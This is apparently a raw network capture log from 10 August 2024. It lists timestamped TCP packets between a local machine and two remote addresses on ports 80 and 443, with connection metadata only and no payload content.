Aug 10, 2024 16:12:25.039828062 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039843082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039855957 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039885044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039889097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039889097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039889097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039900064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039913893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039927959 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039933920 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039942980 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039963961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039975882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039975882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.039978027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.039992094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040005922 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040019989 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040047884 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040047884 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040047884 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040107012 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040134907 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040148973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040163040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040194988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040194988 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040285110 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040298939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040358067 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040510893 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040532112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040548086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040560961 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040575027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040589094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040606976 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040618896 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040620089 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040620089 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040621042 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040621042 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040632010 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040632963 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040647030 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040661097 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040663004 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040676117 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040689945 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040697098 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040704966 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040719986 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040719986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040719986 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040735960 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040750027 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040766001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040766001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040766001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040766001 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040780067 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040783882 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040796995 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040802002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040813923 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040815115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040837049 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040853024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040870905 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.040874004 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.040874004 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.041007042 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.041337967 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041443110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.041480064 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041496038 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041542053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.041665077 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041680098 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041693926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041709900 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041729927 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.041798115 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.041798115 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.041903019 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041917086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041932106 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041944981 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041960001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.041990995 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.041990995 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.042021990 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.042613029 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.042627096 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.042705059 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.042732000 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.042747021 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.042762041 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.042773962 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.042777061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.042792082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.042799950 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.042817116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.042849064 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.057662964 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.057681084 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.057737112 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.057743073 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.057781935 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.058078051 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.065804958 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.065861940 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.065983057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.065996885 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.066009998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.066023111 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.066025019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.066041946 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.066039085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.066052914 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.066072941 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.066080093 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.066082001 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.066127062 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.066131115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.066176891 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.084139109 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.084156036 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.084290981 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.084290981 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.084299088 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.084362984 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.084384918 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.084393978 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.084403992 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.084431887 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.084448099 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.084758043 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.084770918 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.084835052 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.084841967 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.084952116 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.085205078 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.085220098 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.085340023 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.085345030 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.086246014 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.086261034 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.086427927 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.086436033 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.086644888 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.086658001 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.086713076 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.086718082 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.087816954 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.087832928 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.087903976 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.087909937 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.089842081 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.101753950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.101778030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.101793051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.101805925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.101845026 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.101865053 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.101922035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.101936102 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.101949930 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.101964951 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.101979017 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.101991892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.101993084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102015972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102035999 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102051020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102052927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102052927 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102063894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102081060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102085114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102085114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102092981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102108955 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102113962 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102123976 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102138042 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102152109 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102164030 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102176905 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102190018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102204084 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102217913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102231026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102247000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102271080 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102755070 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102767944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102781057 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102802992 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102819920 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102839947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102854967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102869034 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102884054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102899075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.102901936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102932930 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.102945089 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.103218079 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103231907 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103249073 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103261948 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.103275061 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.103291035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.103297949 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103312016 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103327990 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103341103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103379011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.103404999 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.103568077 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103583097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103595972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103614092 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103629112 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103645086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.103651047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103665113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.103672981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.103688002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.103710890 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.104578018 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.104592085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.104607105 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.104628086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.104640961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.104655981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.104655981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.104670048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.104677916 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.104684114 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.104696035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.104697943 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.104713917 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.104721069 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.104742050 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109041929 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109056950 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109074116 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109090090 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109095097 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109101057 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109111071 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109119892 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109123945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109134912 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109148026 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109148979 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109163046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109167099 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109179020 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109183073 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109196901 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109199047 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109213114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109235048 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109237909 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109249115 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109263897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109266996 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109280109 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109293938 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.109296083 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109304905 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109323978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.109340906 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.110016108 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.110029936 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.110044003 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.110059977 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.110083103 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.110084057 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.110096931 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.110101938 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.110111952 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.110126972 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.110136032 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.110155106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.110178947 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114295959 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114317894 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114331961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114345074 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114346027 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114357948 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114358902 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114372969 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114387035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114388943 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114403009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114413977 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114418030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114432096 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114439011 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114445925 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114459038 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114460945 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114478111 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114483118 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114491940 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114507914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114509106 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114521980 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114547014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114571095 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114584923 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114600897 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114614964 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114629030 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114648104 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114654064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114665031 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114670038 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114682913 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114712000 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114720106 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114732981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114733934 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114748001 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114763975 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114773035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114777088 CEST	80	49739	147.45.44.104	192.168.2.4
